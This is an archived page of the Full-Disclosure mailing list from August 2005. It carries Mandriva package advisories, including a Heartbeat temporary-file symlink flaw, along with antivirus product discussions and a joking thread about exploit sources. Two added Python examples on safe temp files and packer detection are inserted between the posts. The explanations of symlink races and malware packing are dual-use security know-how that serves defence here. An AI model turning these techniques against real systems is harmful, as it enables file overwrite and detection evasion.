amd64/10.0/RPMS/lib64netpbm9-9.24-8.2.100mdk.amd64.rpm
 f89f7f330ecb8dd8e9a536afdcfb56f0  
amd64/10.0/RPMS/lib64netpbm9-devel-9.24-8.2.100mdk.amd64.rpm
 0401393af2d5b3a933b487a1e00e3e43  
amd64/10.0/RPMS/lib64netpbm9-static-devel-9.24-8.2.100mdk.amd64.rpm
 2400c52abc020a3ac9883bc02dc77f36  
amd64/10.0/RPMS/netpbm-9.24-8.2.100mdk.amd64.rpm
 7d2bdf5636955adc39bfe13c4c581858  
amd64/10.0/SRPMS/netpbm-9.24-8.2.100mdk.src.rpm

 Mandrakelinux 10.1:
 0c7ca6675e4a1502dc450d8b31076753  10.1/RPMS/libnetpbm9-9.24-8.1.101mdk.i586.rpm
 ac327d0433d6c672e382a2c1f4dc8667  
10.1/RPMS/libnetpbm9-devel-9.24-8.1.101mdk.i586.rpm
 dee01cf52709fbbc65f3a0c21d4573d9  
10.1/RPMS/libnetpbm9-static-devel-9.24-8.1.101mdk.i586.rpm
 6c9bedecf233accd53f123f3c2a26aec  10.1/RPMS/netpbm-9.24-8.1.101mdk.i586.rpm
 8722f08f1813fb796d7b5fa8576f6045  10.1/SRPMS/netpbm-9.24-8.1.101mdk.src.rpm

 Mandrakelinux 10.1/X86_64:
 9b99ec325088181a931983f622c7649f  
x86_64/10.1/RPMS/lib64netpbm9-9.24-8.1.101mdk.x86_64.rpm
 119d4f558fddb4bafee84dc5da3f0c8a  
x86_64/10.1/RPMS/lib64netpbm9-devel-9.24-8.1.101mdk.x86_64.rpm
 13e9911031dc3d8b23da2157451f89a8  
x86_64/10.1/RPMS/lib64netpbm9-static-devel-9.24-8.1.101mdk.x86_64.rpm
 6637e848b29abe54142155f66ac79fb9  
x86_64/10.1/RPMS/netpbm-9.24-8.1.101mdk.x86_64.rpm
 8722f08f1813fb796d7b5fa8576f6045  
x86_64/10.1/SRPMS/netpbm-9.24-8.1.101mdk.src.rpm

 Mandrakelinux 10.2:
 4db608229fad2d6014ea506ad775e9f8  
10.2/RPMS/libnetpbm10-10.26-2.1.102mdk.i586.rpm
 4fd7e7857c692209d4c94a8a5ebe84cc  
10.2/RPMS/libnetpbm10-devel-10.26-2.1.102mdk.i586.rpm
 4521de30a4e9ee995200ae0c1443132b  
10.2/RPMS/libnetpbm10-static-devel-10.26-2.1.102mdk.i586.rpm
 a3b5efc89e18489ef2cd181b20a1dc1b  10.2/RPMS/netpbm-10.26-2.1.102mdk.i586.rpm
 52d2d1a460d07b33fbe7f6204d1cf51f  10.2/SRPMS/netpbm-10.26-2.1.102mdk.src.rpm

 Mandrakelinux 10.2/X86_64:
 37912f8c31bd31b979bfdb69ad357837  
x86_64/10.2/RPMS/lib64netpbm10-10.26-2.1.102mdk.x86_64.rpm
 928a397b673e96ed0fecdd62878aef84  
x86_64/10.2/RPMS/lib64netpbm10-devel-10.26-2.1.102mdk.x86_64.rpm
 b74c96495461b1406af317e91932500e  
x86_64/10.2/RPMS/lib64netpbm10-static-devel-10.26-2.1.102mdk.x86_64.rpm
 30ae5cd7a9e65594e30cf876f352fda6  
x86_64/10.2/RPMS/netpbm-10.26-2.1.102mdk.x86_64.rpm
 52d2d1a460d07b33fbe7f6204d1cf51f  
x86_64/10.2/SRPMS/netpbm-10.26-2.1.102mdk.src.rpm

 Corporate Server 2.1:
 f42bccdec9b6f8a432191730b85d186c  
corporate/2.1/RPMS/libnetpbm9-9.24-4.4.C21mdk.i586.rpm
 3e877555a0533572d788a4d47694bccd  
corporate/2.1/RPMS/libnetpbm9-devel-9.24-4.4.C21mdk.i586.rpm
 57dcadc0b0d94243894bccdaf17acf8a  
corporate/2.1/RPMS/libnetpbm9-static-devel-9.24-4.4.C21mdk.i586.rpm
 1fa1e01964db5302ddc773c2be67ca6b  
corporate/2.1/RPMS/netpbm-9.24-4.4.C21mdk.i586.rpm
 511aeb9ce3bdb6429e8a8ce06b873b6b  
corporate/2.1/SRPMS/netpbm-9.24-4.4.C21mdk.src.rpm

 Corporate Server 2.1/X86_64:
 6dfd39d7a3b0db15b273b2b7b7db01c4  
x86_64/corporate/2.1/RPMS/libnetpbm9-9.24-4.4.C21mdk.x86_64.rpm
 50c24455f7b43e1f7fe7581a12655c39  
x86_64/corporate/2.1/RPMS/libnetpbm9-devel-9.24-4.4.C21mdk.x86_64.rpm
 b947dcdb4226298cb90c644cce9dbd4c  
x86_64/corporate/2.1/RPMS/libnetpbm9-static-devel-9.24-4.4.C2

[Full-disclosure] MDKSA-2005:132 - Updated heartbeat packages fix temporary file vulnerabilities

2005-08-10 Thread Mandriva Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

Mandriva Linux Security Update Advisory
 ___

 Package name:   heartbeat
 Advisory ID:MDKSA-2005:132
 Date:   August 9th, 2005

 Affected versions:  Corporate 3.0
 __

 Problem Description:

 Eric Romang discovered that Heartbeat would create temporary files with
 predictable filenames.  This could allow a local attacker to create
 symbolic links in the temporary file directory pointing to a valid file
 on the filesystem, which could lead to the file being overwritten with the
 rights of the user running the vulnerable script.
 
 The updated packages have been patched to correct this problem.
 ___

 References:

  http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2231
 __

 Updated Packages:
  
 Corporate 3.0:
 988b71b1018f73f77a94f9ac4d736ad1  
corporate/3.0/RPMS/heartbeat-1.2.3-2.1.C30mdk.i586.rpm
 6afa9bcec600cba453e97cfb8910eb66  
corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.1.C30mdk.i586.rpm
 02d4854a8683c467debb9a56a44123ac  
corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.1.C30mdk.i586.rpm
 23618a86f47b4289e9c85732569cfc1b  
corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.1.C30mdk.i586.rpm
 c515a12308e088d3aa322de379040d0a  
corporate/3.0/RPMS/libheartbeat-pils0-1.2.3-2.1.C30mdk.i586.rpm
 cd30d48b40ed4d9c4e2e86d6fcb0d9c9  
corporate/3.0/RPMS/libheartbeat-pils0-devel-1.2.3-2.1.C30mdk.i586.rpm
 cf2081419d50b42044a69de786b3e059  
corporate/3.0/RPMS/libheartbeat-stonith0-1.2.3-2.1.C30mdk.i586.rpm
 f2cef6941e6d635f1f21fe651e9646b4  
corporate/3.0/RPMS/libheartbeat-stonith0-devel-1.2.3-2.1.C30mdk.i586.rpm
 6da3d9489adc023b552116324c70f35a  
corporate/3.0/RPMS/libheartbeat0-1.2.3-2.1.C30mdk.i586.rpm
 67f33aac7c08767c5b2df9fb71ad64aa  
corporate/3.0/RPMS/libheartbeat0-devel-1.2.3-2.1.C30mdk.i586.rpm
 0f9dc2960afa29d70f57aff6573a0559  
corporate/3.0/SRPMS/heartbeat-1.2.3-2.1.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 1c1a953510c8d5a82c9d5774c12b915a  
x86_64/corporate/3.0/RPMS/heartbeat-1.2.3-2.1.C30mdk.x86_64.rpm
 7c9f07341f2d7e9e68df078365c05334  
x86_64/corporate/3.0/RPMS/heartbeat-ldirectord-1.2.3-2.1.C30mdk.x86_64.rpm
 5cc9ef2dbf09da3b5bad12387b9d94a0  
x86_64/corporate/3.0/RPMS/heartbeat-pils-1.2.3-2.1.C30mdk.x86_64.rpm
 972307d2bdf4396e2df0b4fd0c3f8007  
x86_64/corporate/3.0/RPMS/heartbeat-stonith-1.2.3-2.1.C30mdk.x86_64.rpm
 d2287fd3e7d1ce3cbabc8331f9f8bfea  
x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-1.2.3-2.1.C30mdk.x86_64.rpm
 5e523b3319eb3519420b9f651f6c5c01  
x86_64/corporate/3.0/RPMS/lib64heartbeat-pils0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 e3276d0abb8c2c79287fe50bf6934a8a  
x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-1.2.3-2.1.C30mdk.x86_64.rpm
 c636cc202c0ffdb8132bcfbb5d2ed142  
x86_64/corporate/3.0/RPMS/lib64heartbeat-stonith0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 de2a839582b402dd63d9b435a956c103  
x86_64/corporate/3.0/RPMS/lib64heartbeat0-1.2.3-2.1.C30mdk.x86_64.rpm
 e05f6de07919d8dc994a83951ebf0794  
x86_64/corporate/3.0/RPMS/lib64heartbeat0-devel-1.2.3-2.1.C30mdk.x86_64.rpm
 0f9dc2960afa29d70f57aff6573a0559  
x86_64/corporate/3.0/SRPMS/heartbeat-1.2.3-2.1.C30mdk.src.rpm
 ___

 To upgrade automatically use MandrakeUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFC+lKZmqjQ0CJFipgRAiCRAKCEiLCa1CtuxcbWTjlTXtITcgsqJwCgl7Qp
Inpxe+m9REv2u+kqZLGQIT8=
=G34L
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
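The predictable-temporary-file problem the advisory above describes, as an added example in Python rather than the Heartbeat project's own shell scripts (none of this is Mandriva's or Heartbeat's code): the predictable naming pattern is shown beside `tempfile.mkstemp()`, together with the `open()` flags and the post-creation check that make a pre-planted link fail closed instead of being followed. The base name `heartbeat-example`, the directory layout and the file contents are constructed placeholders, and the ownership check assumes a Unix host.

```python
import os
import stat
import tempfile

# Added example (not code from the Mandriva advisory or the Heartbeat project).
# Contrasts the predictable temporary file name the advisory describes with a
# safely created one.  "heartbeat-example" is a hypothetical placeholder name.


def predictable_tmp_path(tmpdir, base="heartbeat-example"):
    """The weak pattern: a name anyone can compute in advance from the PID."""
    return os.path.join(tmpdir, f"{base}.{os.getpid()}")


def write_temp_unsafely(tmpdir, data):
    """The 'before' pattern: plain open() on a predictable name.  It does not
    use O_EXCL and it follows symlinks, so a link already sitting at that
    path redirects the write to whatever the link points at."""
    path = predictable_tmp_path(tmpdir)
    with open(path, "wb") as fh:
        fh.write(data)
    return path


def write_temp_safely(tmpdir, data, prefix="heartbeat-example."):
    """The fix: mkstemp() creates the file itself with O_CREAT|O_EXCL and
    mode 0600 under an unpredictable name, so no planted link can be there."""
    fd, path = tempfile.mkstemp(prefix=prefix, dir=tmpdir)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return path


def open_new_file_strictly(path, mode=0o600):
    """Create `path` only if nothing exists there.  O_EXCL makes the kernel
    refuse any existing entry (a symlink included) with EEXIST, so a planted
    link fails closed; O_NOFOLLOW is added where the platform offers it."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    return os.open(path, flags, mode)


def is_safe_tempfile(path):
    """Post-creation check: a regular file (not a link), owned by us, with no
    group/other permission bits.  lstat() is used so a link is not followed."""
    st = os.lstat(path)
    return (stat.S_ISREG(st.st_mode)
            and st.st_uid == os.getuid()
            and (st.st_mode & 0o077) == 0)


def demo():
    """Run the comparison in a private directory and report the outcomes."""
    with tempfile.TemporaryDirectory() as d:
        safe = write_temp_safely(d, b"constructed cluster state")
        # Constructed scenario: a link already sits at the predictable name,
        # pointing at a file of our own inside the same private directory.
        target = os.path.join(d, "some-file-we-own.txt")
        open(target, "wb").close()
        planted = predictable_tmp_path(d)
        os.symlink(target, planted)
        try:
            os.close(open_new_file_strictly(planted))
            refused = False
        except FileExistsError:
            refused = True
        return {
            "safe_file_ok": is_safe_tempfile(safe),
            "safe_name_unpredictable": safe != planted,
            "planted_link_refused": refused,
            "planted_path_is_link": os.path.islink(planted),
        }


if __name__ == "__main__":
    print(demo())
```

`write_temp_unsafely()` is kept only as the "before" shape for comparison; `demo()` never calls it, and the strict open is what shows the difference: with the link in place, `O_EXCL` raises `FileExistsError` rather than truncating the link's target.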


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
Thanks Axel (love Guns and Roses by the way; I'm sure you haven't heard that
one before). I have been searching around the net for some user reviews on
those that you have mentioned. I am about a week into this research. It is
starting to come to a head in the past couple days as RTVSCAN.exe is causing
more and more computer slow downs. Not good when a batch is trying to be
posted in our financial system. In the end I need a reliable product that
has central management with lockout features to the user. Malware detection
is tied for #1 for the product I end up choosing. My users have at least
stopped opening any attachments they get that they don't know who they are
from and so on. As we all know the end user is the z factor in the whole
situation of choosing a good security product. 

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca


-Original Message-
From: Axel Pettinger [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 3:45 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

Hi Jason,

With such a small user network you should definitely have a look at the
products of other anti virus vendors - not just Symantec's. In our
company we used NAV CE (later SAV CE) several years till 2004, but I was
never happy with it. It's bloated and its malware detection capabilities
are not very good.

Just as an example, do you know runtime compressors (like UPX)? Malware
is very often packed with such compressors to make the file smaller and
the file contents less readable. Many runtime compressors exist, but
only a few av companies make sure that the format of these runtime
compressors is known to their av scan engine so that the scanner is able
to detect malicious code inside of these packed executables. The results
are funny identifications of one and the same malware (compressed,
unpacked, repackaged with another runtime compressor). Symantec's av
scanner doesn't know the format of many runtime compressors and as a
result it usually fails to detect known packed malware when it is
unpacked or repackaged with another compressor.

My favorite av scanners are those from Kaspersky (www.kaspersky.com) and
McAfee because in my experience both have simply the best malware
detection capabilities. Kaspersky's av scanner is also very easy to
update, has small definitions, - if you want - hourly updates and knows
the most runtime compressor and archive formats of all av scanners. You
should definitely have a closer look at McAfee's and Kaspersky's av
products. As I said before they are very good in malware detection, but
in regard to performance, stability and general handling of these
products it's up to you to find out whether they're suited for your
environment.

Regards,
Axel Pettinger


> Jason Bethune wrote:
> 
> I know this is not really the place to ask this question but I need
> some professional advice and well you guys know a lot. I need to get
> rid of our current Antivirus solution in the small 20+ user network we
> have running on SBS 2003. Currently running NAV 7.6 Corporate Edition.
> Any opinions on the new version of Norton 10.0? Should I look at Trend
> Micro? Both seem to priced about the same for Canadian customers. I
> hope this is not too way off topic but I don't post here very often.
> If you can give me some advice that would be greatly appreciated.
> 
> Jason
> 
> ---
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
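Axel's point above about runtime packers, as an added example (not code from any poster or antivirus vendor in this thread): a small PE section walker with two defender-side heuristics, known packer section names and per-section byte entropy, run over three constructed images. The section-name list, the 7.0 bits/byte threshold and the sample images are assumptions chosen for illustration; the images have valid headers for the parser but are not executables.

```python
import math
import random
import struct

# Added example, not code from any poster or antivirus vendor on this thread.
# Two heuristics a defender can run on a PE file: well-known packer section
# names, and near-random byte entropy, which survives repacking under other names.

# UPX's default section names (assumption: an illustrative list, not a catalogue).
KNOWN_PACKER_SECTIONS = {"UPX0", "UPX1", "UPX2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_sections(data: bytes):
    """Walk the DOS/COFF headers and return [(section name, raw bytes), ...]."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]       # NumberOfSections
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]  # SizeOfOptionalHeader
    table = pe_off + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(nsec):
        name, _vsize, _vaddr, rawsize, rawptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         data[rawptr:rawptr + rawsize]))
    return sections


def looks_packed(data: bytes, entropy_threshold: float = 7.0):
    """Return (verdict, reasons).  The name match catches stock UPX; the entropy
    check still fires when the same payload is repacked under ordinary names."""
    reasons = []
    for name, raw in parse_sections(data):
        if name in KNOWN_PACKER_SECTIONS:
            reasons.append(f"packer section name {name!r}")
        if len(raw) >= 256:                  # too few bytes give a noisy estimate
            h = shannon_entropy(raw)
            if h >= entropy_threshold:
                reasons.append(f"{name!r} has {h:.2f} bits/byte of entropy")
    return bool(reasons), reasons


def build_pe(sections):
    """Construct a minimal PE32 image from [(name, raw bytes)] for testing."""
    opt_size = 224                                       # PE32 optional header size
    header_len = 64 + 4 + 20 + opt_size + 40 * len(sections)
    dos = bytearray(64)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 64)                # e_lfanew -> PE header at 64
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    hdrs, payload, offset = b"", b"", header_len
    for name, raw in sections:
        hdrs += struct.pack("<8sIIIIIIHHI", name.encode(), len(raw), 0x1000,
                            len(raw), offset, 0, 0, 0, 0, 0xE0000020)
        payload += raw
        offset += len(raw)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + hdrs + payload


def _pseudo_random_bytes(n, seed=2005):
    """Deterministic stand-in for a compressed payload (constructed sample)."""
    rng = random.Random(seed)
    return bytes(rng.getrandbits(8) for _ in range(n))


# Constructed samples: a plain image, a stock-UPX-looking one, and the same
# high-entropy payload hidden under ordinary section names.
PLAIN_SAMPLE = build_pe([(".text", bytes(range(32, 127)) * 20), (".data", bytes(1024))])
UPX_SAMPLE = build_pe([("UPX0", b""), ("UPX1", _pseudo_random_bytes(2048))])
REPACKED_SAMPLE = build_pe([(".text", _pseudo_random_bytes(2048)), (".rsrc", bytes(64))])

if __name__ == "__main__":
    for label, sample in [("plain", PLAIN_SAMPLE), ("upx", UPX_SAMPLE), ("repacked", REPACKED_SAMPLE)]:
        print(label, looks_packed(sample))
```

The third sample is the one that matters for Axel's argument: it carries no packer section name at all, so a scanner keyed on file shape alone passes it, while the entropy check still flags it. A production scanner would go further and actually unpack the known formats before matching signatures; this example only shows the triage step.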


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
Hey Steve,

I have read the support article on doscan.exe causing high cpu problems. I'm
curious to know if that would cause a problem in my environment where we
have no dos based applications. Is the doscan.exe installed by default? We
run basically 4 servers SBS 2003, Windows Server 2000, Windows Server Web
and Windows Server 2000 for GIS Applications. All of my clients are XP Pro
with full updates using SUS. Thanks for the heads up on the SAV CE 10.0 roll
out you did...I'm still trying to figure out the best route for our small
government office to take on this.

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca


-Original Message-
From: Steve Kirk [mailto:[EMAIL PROTECTED] 
Sent: Wednesday, August 10, 2005 3:07 PM
To: Jason Bethune
Subject: Re: [Full-disclosure] Antivirus

Hi Jason,

This last spring I was put in the position of deploying SAV CEv10.0 for 
my company - about 150 clients/servers.  Almost immediately it started 
causing problems.  I work for a video game developer for Playstation2 
games, and (sadly) a lot of the tools for PS2 are DOS-based (they're not 
Win32 apps).

First off there's an "issue" with 10.0 where doscan.exe causes high CPU 
usage - dragging the machine to a halt.  SAV does a "quick scan" (and I 
use the term loosely) on boot.  We've put in a regkey fix to remove the 
boot scan. 

They added "tamper protection" which a lot of our tools seem to trigger.  
We've had to disable that.

And generally it has been responsible for a LOT of performance problems.  
We're using high-end x86 dual-Xeon workstations, too - so it's not like 
we're under-powered.

Needless to say I'm currently doing a hefty performance analysis of 
other anti-virus solutions so I can find something "nicer" towards our 
environment.

HTH,
Steve



Jason Bethune wrote:

>I only use Terminal Services in admin mode for my servers from home. I know
>my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
>and how much resources it takes up on the computers which the client is
>installed.
>
>Jason Bethune
>
>IT Specialist
>Town of Kentville
>354 Main Street
>Kentville, NS 
>B4N 1K6
>
>www.town.kentville.ns.ca
>
>-Original Message-
>From: Steve Friedl [mailto:[EMAIL PROTECTED] 
>Sent: Wednesday, August 10, 2005 1:23 PM
>To: Jason Bethune
>Subject: Re: [Full-disclosure] Antivirus
>
>On Wed, Aug 10, 2005 at 01:20:31PM -0300, Jason Bethune wrote:
>
>>I know this is not really the place to ask this question but I need some
>>professional advice and well you guys know a lot. I need to get rid of our
>>current Antivirus solution in the small 20+ user network we have running on
>>SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the
>>new version of Norton 10.0? Should I look at Trend Micro? Both seem to be
>>priced about the same for Canadian customers. I hope this is not too way off
>>topic but I don't post here very often. If you can give me some advice that
>>would be greatly appreciated.
>
>One tidbit: if you use RAdmin (remote administration software), Symantec
>10. corporate sees it as a threat, and there's not any really good way
>to centrally deal with this. It's been a terrible mess.
>
>Steve
>

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Fw: [Full-disclosure] Antivirus

2005-08-10 Thread SACAR1



In my experience I can just say:
Norton: is excellent for handling physical clusters on a hard disc; as an antivirus, NO WAY.
Bitdefender: was excellent when it was in the hands of Kaspersky Labs, the Russian company, with very good on-time vaccination; now it is delayed one week or more to provide good protection and disinfection tools.
NOW the best results for me:
Using Windows: www.pandasoftware.com (Titanium, Platinum, Business Secure and true prevent)
Using Linux: the classic Icelandic www.f-prot.com

Sergio L.C.
 
 


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Bethune
Sent: Wednesday, August 10, 2005 12:21 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Antivirus

  
  I know this is not really the place to ask this question but I need some professional advice and well you guys know a lot. I need to get rid of our current Antivirus solution in the small 20+ user network we have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 10.0? Should I look at Trend Micro? Both seem to be priced about the same for Canadian customers. I hope this is not too way off topic but I don't post here very often. If you can give me some advice that would be greatly appreciated.

  Jason
  
  

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Larry Seltzer
>>BitDefender. ... not as expensive as Symantec.  Faster updates.. 
 
That's another point worth making generally: everyone updates faster than
Symantec.  Symantec sends out normal updates once a week and an attack has
to be nuclear war for them to go "out of cycle."


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Pedro Hugo



Trend Micro has a problem, pattern files. I have seen many viruses not being detected by TrendMicro solutions.
For desktops I have only used OfficeScan. Works well, doesn't seem to waste too many resources.

Something I didn't like either from TrendMicro was fixes and hotfixes. It's a bit of a mess, with some available on a few of their websites, and others not.


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Bethune
Sent: Wednesday, 10 August 2005 17:21
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Antivirus

I know this is not really the place to ask this question but I need some professional advice and well you guys know a lot. I need to get rid of our current Antivirus solution in the small 20+ user network we have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 10.0? Should I look at Trend Micro? Both seem to be priced about the same for Canadian customers. I hope this is not too way off topic but I don't post here very often. If you can give me some advice that would be greatly appreciated.

Jason

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread Todd Towles
Wait, what is your IP X? I want to try this new Cisco Shellcode..lol 

> -Original Message-
> From: [EMAIL PROTECTED] 
> [mailto:[EMAIL PROTECTED] On Behalf 
> Of xyberpix
> Sent: Wednesday, August 10, 2005 11:47 AM
> To: Javi Polo
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] The best 0-day exploit source
> 
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> I hear that http://::1 is also a good one
> 
> xyberpix
> 
> On 10 Aug 2005, at 12:56, Javi Polo wrote:
> 
> > On Aug/10/2005, [EMAIL PROTECTED] wrote:
> >
> >
> >>> can anybody suggest a website???
> >>>
> >> http://127.0.0.1/0-d-Xpl0iz
> >>
> >
> > [EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
> > --13:55:05--  http://127.0.0.1/0-d-Xpl0iz
> >=> `0-d-Xpl0iz'
> > Connecting to 127.0.0.1:80... connected.
> > HTTP request sent, awaiting response... 403 Forbidden
> > 13:55:05 ERROR 403: Forbidden.
> >
> > [EMAIL PROTECTED]:~$
> >
> > who runs the site?
> > I want access
> >
> > --
> > Javier Polo @ Datagrama
> > 902 136 126
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
> 
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1.4.1 (Darwin)
> 
> iD8DBQFC+i91cRMkOnlkwMERApVtAKCEYEB83FhiFcgtOZGvznEDW3rjZQCfY7mv
> 4bYlcJ5Xe6UvLI9QO6Zji9w=
> =PLGC
> -END PGP SIGNATURE-
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
> 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] The best 0-day exploit source

2005-08-10 Thread xyberpix

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I hear that http://::1 is also a good one

xyberpix

On 10 Aug 2005, at 12:56, Javi Polo wrote:


On Aug/10/2005, [EMAIL PROTECTED] wrote:



can anybody suggest a website???


http://127.0.0.1/0-d-Xpl0iz



[EMAIL PROTECTED]:~$ wget http://127.0.0.1/0-d-Xpl0iz
--13:55:05--  http://127.0.0.1/0-d-Xpl0iz
   => `0-d-Xpl0iz'
Connecting to 127.0.0.1:80... connected.
HTTP request sent, awaiting response... 403 Forbidden
13:55:05 ERROR 403: Forbidden.

[EMAIL PROTECTED]:~$

who runs the site?
I want access

--
Javier Polo @ Datagrama
902 136 126
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.1 (Darwin)

iD8DBQFC+i91cRMkOnlkwMERApVtAKCEYEB83FhiFcgtOZGvznEDW3rjZQCfY7mv
4bYlcJ5Xe6UvLI9QO6Zji9w=
=PLGC
-END PGP SIGNATURE-
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


RE: [Full-disclosure] Antivirus

2005-08-10 Thread Chuck Fullerton




One word.  BitDefender.

More words...  New version coming out next week!  Not as expensive as Symantec.  Faster updates..

www.bitdefender.us


From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Jason Bethune
Sent: Wednesday, August 10, 2005 12:21 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Antivirus

I know this is not really the place to ask this question but I need some professional advice and well you guys know a lot. I need to get rid of our current Antivirus solution in the small 20+ user network we have running on SBS 2003. Currently running NAV 7.6 Corporate Edition. Any opinions on the new version of Norton 10.0? Should I look at Trend Micro? Both seem to be priced about the same for Canadian customers. I hope this is not too way off topic but I don't post here very often. If you can give me some advice that would be greatly appreciated.

Jason

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

RE: [Full-disclosure] Antivirus

2005-08-10 Thread Jason Bethune
Do you find the client side of it runs well? My RTVSCAN.exe on a lot of
machines in the office are starting to eat up 100% CPU. This is another
reason I need to upgrade. 

Jason Bethune

IT Specialist
Town of Kentville
354 Main Street
Kentville, NS 
B4N 1K6

www.town.kentville.ns.ca


-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Evan Waite
Sent: Wednesday, August 10, 2005 1:34 PM
To: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

Actually NAV Corp (aka SAV) works fine in Application and Admin mode for
Terminal services.  We've just completed an upgrade and so far
everything is working fine.  I would however recommend you only use
10.0.1.1000 (current) or higher (the first build of 10.0 was a little
flaky)

-E

-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Jason
Bethune
Sent: Wednesday, August 10, 2005 10:29 AM
To: 'Steve Friedl'
Cc: full-disclosure@lists.grok.org.uk
Subject: RE: [Full-disclosure] Antivirus

I only use Terminal Services in admin mode for my servers from home. I know
my current NAV doesn't like TS at all. I am a bit sick of Norton (Symantec)
